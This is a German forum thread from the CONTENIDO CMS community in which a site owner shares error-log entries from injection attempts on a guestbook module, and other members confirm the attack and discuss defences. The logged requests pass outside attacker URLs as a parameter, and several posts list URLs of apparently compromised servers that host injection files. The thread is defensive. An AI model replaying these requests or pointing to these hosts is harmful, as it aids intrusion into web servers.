Versuch zu Hacken?

BagHira · Beitrag von **BagHira** » So 3. Feb 2008, 22:54

hallo zusammen,

habe eben mein errorlog angesehen und folgende einträge gefunden. ich befürchte das man versucht hat die page zu hacken, ist dem so?

Code: Alles auswählen

[31-Jan-2008 11:02:29] /gaestebuch/anzeigen/gaestebuchanzeigen.html?start=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fsokimi%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.unduetretoccaate.it/codice/aseje/sokimi/, 5' at line 1
SELECT id, active, name, email, email_active, url, entry, image, comment, iphost, user1, user2, user3, UNIX_TIMESTAMP(date) as datum FROM con_vpguestbook WHERE active=1 AND client=1 AND lang=1 ORDER BY date DESC LIMIT http://www.unduetretoccaate.it/codice/aseje/sokimi/, 5
[31-Jan-2008 11:02:29] /gaestebuch/anzeigen/gaestebuchanzeigen.html?start=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fsokimi%2F next_record called with no query pending in Module ID 4.
[31-Jan-2008 11:02:30] /gaestebuch/anzeigen/gaestebuchanzeigen.html?start=http%3A%2F%2Fwww.interkonet.com%2Fenxicmarxant%2Fweb%2Feditor%2Fscripts%2Ficons%2Filiki%2Fowixu%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.interkonet.com/enxicmarxant/web/editor/scripts/icons/iliki/owixu/, 5' at line 1
SELECT id, active, name, email, email_active, url, entry, image, comment, iphost, user1, user2, user3, UNIX_TIMESTAMP(date) as datum FROM con_vpguestbook WHERE active=1 AND client=1 AND lang=1 ORDER BY date DESC LIMIT http://www.interkonet.com/enxicmarxant/web/editor/scripts/icons/iliki/owixu/, 5
[31-Jan-2008 11:02:30] /gaestebuch/anzeigen/gaestebuchanzeigen.html?start=http%3A%2F%2Fwww.interkonet.com%2Fenxicmarxant%2Fweb%2Feditor%2Fscripts%2Ficons%2Filiki%2Fowixu%2F next_record called with no query pending in Module ID 4.

ich denke, hofe wegen "next_record called with no query pending in Module ID 4" das dies nicht funktioniert hat?

tono · Beitrag von **tono** » So 3. Feb 2008, 23:30

BagHira hat geschrieben:hallo zusammen,

habe eben mein errorlog angesehen und folgende einträge gefunden. ich befürchte das man versucht hat die page zu hacken, ist dem so?

Ja, siehts so aus.

BagHira hat geschrieben: ich denke, hofe wegen "next_record called with no query pending in Module ID 4" das dies nicht funktioniert hat?

Mit diesem Versuch nicht, aber wer sagt, dass der Angreider es dabei belassen hat? Ein erfolgreicher Versuch wird auch nicht im Errorlog auftauchen!

i-fekt · Beitrag von **i-fekt** » So 3. Feb 2008, 23:33

Problem sind u.a. auch Hinweise im Quellcode auf das verwendete CMS. Ein Hacker scannt einfach wahllos Seite nach diesen Codefragmenten, dann weiß er welches CMS dahintersteckt und wie man es evtl. überlisten kann.

Ich rate daher, den entsprechenden Meta-tag aus dem Code zu entfernen.

wosch · Beitrag von **wosch** » Mo 4. Feb 2008, 20:23

i-fekt hat geschrieben:Ich rate daher, den entsprechenden Meta-tag aus dem Code zu entfernen.

Dann schau mal in das Layout (Quelltext) einer 4.6.23-Version.
Was im Layout zwischen den Kommentatren steht:

Code: Alles auswählen

This website was ...
usw.

Dann lesen wir mal hier:
http://www.contenido.de/forum/viewtopic.php?t=13352

Und dann dort:
http://www.contenido.de/forum/viewtopic.php?p=111209

Fällt dir was auf?

Zwischen den 18. Jan. und dem 1. Feb. war ein Angriff nach dem anderen, jeden Tag ca. 15 Minuten, man konnte die Uhr danach stellen.
Es wurde jeden Tag mit einem anderen Server und nach einer anderen Methode angegriffen.
Das war automatisiert, mit einem Script ohne jedes menschliche Eingreifen mit immer anderen Varianten der injektion-Datei.

Der war auch dran beteiligt:
http://www.soeasywebsite.com/soeasycasino/maj/

Interessant das hier - jeweils runterschrollen oder gleich im Quelltext gucken:

http://www.soeasywebsite.com/soeasycasino/maj/eba/

http://www.soeasywebsite.com/soeasycasino/maj/ebayux/

usw.

Das gleiche mit dem hier:
http://www.channelnewsperu.com/imagenes ... os/eyuxix/

Wenn Contenido, egal welche Version, eine Schwachstelle hat, so wird sie gefunden.
Und wenn man Contendio-Systeme mit Such-Strings findet, hat wer gleich die Methode zum einzudringen.
Aber lieber Spielereien, Zukunfts-Phantasien, auf Web 2.0 aufspringen, ... als ein Produkt so zu optiemieren das sich die Hacker die Zähne ausbeissen.
*KOPFSCHÜTTEL*

BagHira · Beitrag von **BagHira** » Mo 4. Feb 2008, 21:29

i-fekt hat geschrieben:Ich rate daher, den entsprechenden Meta-tag aus dem Code zu entfernen.

Hallo i-fekt, vielen Dank für deinen Tipp, den ich heute morgen umgesetzt habe. Ich komme leider erst jetzt dazu hier etwas zu schreiben, da wir Besuch hatten.

Eigentlich dachte ich, Contenido nach meinem Ermessen "sicher" abgeschirmt zu haben (htaccess, andere Domain für das Backend) aber dem ist dann wohl doch nicht so...

Ich dachte auch immer, "mir kann so was nicht passieren, hab ja alles mögliche getan..." auf jeden fall ist man da doch schon sehr beunruhigt wenn bei einem selber eine URL-Injection versucht wird.

rbi · Beitrag von **rbi** » Di 5. Feb 2008, 11:36

Mal ganz ehrlich: Das Problem liegt nicht bei Contenido sondern beim Gästebuch, das hier eingesetzt wird. Wenn dieses GET Parameter ungefiltert an die DB liefert, sollte man sich Gedanken machen... Und es lieber mal nicht weiter einsetzen.

Beitrag von **Dodger77** » Di 5. Feb 2008, 12:55

Ich habe das Ausgabemodul soeben überarbeitet:

http://www.contenido.org/forum/viewtopic.php?t=10316

BagHira · Beitrag von **BagHira** » Di 5. Feb 2008, 19:46

Vielen Dank für die prompte Hilfe,

ich habe die Tipps von i-fekt, wosch sowie die Modifikation von dodger77 nun komplett umgesetzt. Den letzten Eintrag im Error-Log (wie oben) hatte ich um 14:31 Uhr - nun bin ich mal gespannt ob das jetzt aufhört.

Nach meinem Chounter zu urteilen grast das Script die komplette Site ab um nach "Sicherheitslöchern" zu suchen.
Ich bin mir aber fast sicher das das "Teil" speziell nach Contenido sucht und hierbei nach dem "vpGuestbook" welches ich in modifizierter weise auch verwende.
Es sucht die Site hierbei nicht gezielt nach Formularen ab um zu Spam zu verschicken - es sucht meiner Meinung nach der angesprochen Sicherheitslücke um den Server zu übernehmen....

Was haltet Ihr davon?

wosch · Beitrag von **wosch** » Di 5. Feb 2008, 22:24

BagHira hat geschrieben:Nach meinem Chounter zu urteilen grast das Script die komplette Site ab um nach "Sicherheitslöchern" zu suchen.
... es sucht meiner Meinung nach der angesprochen Sicherheitslücke um den Server zu übernehmen....

Was haltet Ihr davon?

Bingo.
Du hast 99 Punkte und gewinnst einen Kasten Maggi und einen halben Turnschuh

(Genauso ist es)

Wobei das vpGuestbook hier vermutlich eher zufällig ins Visier geraten ist.
Hauptziel dürfte das System als solches sein.

BagHira · Beitrag von **BagHira** » Di 5. Feb 2008, 22:30

wosch hat geschrieben: Du hast 99 Punkte und gewinnst einen Kasten Maggi und einen halben Turnschuh

Mit einem halben Turnschuh komm ich nicht weit

WAS kann ich / man deiner meinung nach machen das die Site "relativ" sicher vor solchen arttacken wird?

wosch · Beitrag von **wosch** » Mi 6. Feb 2008, 10:16

BagHira hat geschrieben: WAS kann ich / man deiner meinung nach machen das die Site "relativ" sicher vor solchen arttacken wird?

Das was alle anderen auch schon immer und immer wieder gesagt haben:
Update auf 4.6.15 bzw. 4.6.23
Hackversuche hier sicherheitshalber posten ob ein neuer Trick dabei ist,
hoffen das du immer einen Tick schneller reagierst wie die Hacker ...

Denn Provider bitten die Sicherheitseinstellungen immer wieder mal einen Tick straffer einzustellen.
Ich finde den Hinweis nicht mehr, @dodger hat mir mal einige gute Tipps gegeben was der Provider wie ändern sollte.

Es ist ein Wettlauf, zwischen den Entwicklern und den Hackern.
Nur wer sich schneller bewegt / reagiert / informiert gewinnt.
Wobei die Hacker immer einen Vorteil haben, sie brauchen auf nichts und niemanden Rücksicht nehmen und haben als "Gegner" meistens eine zähe und träge reagierende Core-Entwickler-Gemeinschaft.

kummer · Beitrag von **kummer** » Mi 6. Feb 2008, 11:08

einen wesentlichen gewinn könnte man bereits erzielen, wenn von allen modulen und von contenido - mindestens im frontend-bereich - nur noch ein einziger get-parameter verwendet werden würde (idart) und dieser in jedem fall numerisch sein müsste oder dann wenigstens ausschliesslich aus alphanumerischen und numerischen zeichen sowie allenfalls noch einem minus (-) und einem unterstrich (_) bestehen dürfte (für modrewrite). für eine blätterfunktion könnte man dann allenfalls noch einen zweiten parameter einführen (page). alle übrigen parameter müssten dann per post übertragen werden.

wenn das dann so wäre, könnte man bereits unterbinden, dass ein request contenido erreicht, wenn er nicht einer einfachen prüfung entspricht:

(1) wenn ein get-parameter anders lautet als idart oder page -> abbruch mit exit

(2) wenn !is_numeric($_GET['page']) -> abbruch mit exit

(3) wenn isset($_GET['idart']) && !preg_match('/^[0-9a-zA-Z_-]$/', $_GET['idart']) -> abbruch mit exit

alle mit post übertragenen parameter müsste man nach meiner meinung konfigurieren und jeweils mit einer regex versehen können. unmittelbar nach den oben genannten prüfungen würde eine prüfung der post-paramter erfolgen:

(1) wenn post-parameter nicht konfiguriert -> abbruch mit exit

(2) wenn post-paramter nicht der definierten regex entspricht -> entsprechenden paramter auf zahlen, buchstaben und lücken reduzieren.

das gleiche prinzip könnte man auch auf die get-paramter anwenden. das ganze wäre keine grosse sache und müsste einfach ganz am anfang der front_content.php eingebunden werden.

ein nachteil ist bloss, dass man natürlich jeden verwendeten paramter konfigurieren muss. aber der aufwand ist nicht wirklich gross und dürfte sich lohnen.

gruss,
andreas

kummer · Beitrag von **kummer** » Mi 6. Feb 2008, 11:09

ein nachtrag noch: ich bin bereits, das zu programmieren. allerdings nur unter der bedingung, dass es dann in ein ordentliches release einfliesst.

kummer · Beitrag von **kummer** » Mi 6. Feb 2008, 12:17

ich habe mal was entworfen: http://www.editio.ch/cms/front_content. ... uleView=49

für anregungen bin ich dankbar.

gruss,
andreas

wosch · Beitrag von **wosch** » Do 7. Feb 2008, 14:30

Und wieder eine Angriffswelle

Diesmal war u.a. der dran beteiligt:
http://www.felixtorresycia.com/admin/correo/enaq/

immer der gleiche Aufbau (und ähnliche Erstellungsdaten)
diesmal wurde auch mit JS-Dateien was versucht:
http://www.felixtorresycia.com/admin/co ... q/check.js

Interessant auch hier diese Seite:
http://www.felixtorresycia.com/admin/correo/

http://www.felixtorresycia.com/admin/correo/menu.php

http://www.felixtorresycia.com/admin/co ... tenido.php

ob der Begriff Contenido links im Menü sich auf das CMS bezieht?
Nein, aber man erkennt hier schön wie dieser Server gehackt wurde:
http://www.felixtorresycia.com/admin/co ... idcorreo=6

und nun als Zoombie bzw. als Basis für weitere Hacks, auch auf Contenido, verwendet wird

CONTENIDO Forum

Versuch zu Hacken?

Versuch zu Hacken?

Re: Versuch zu Hacken?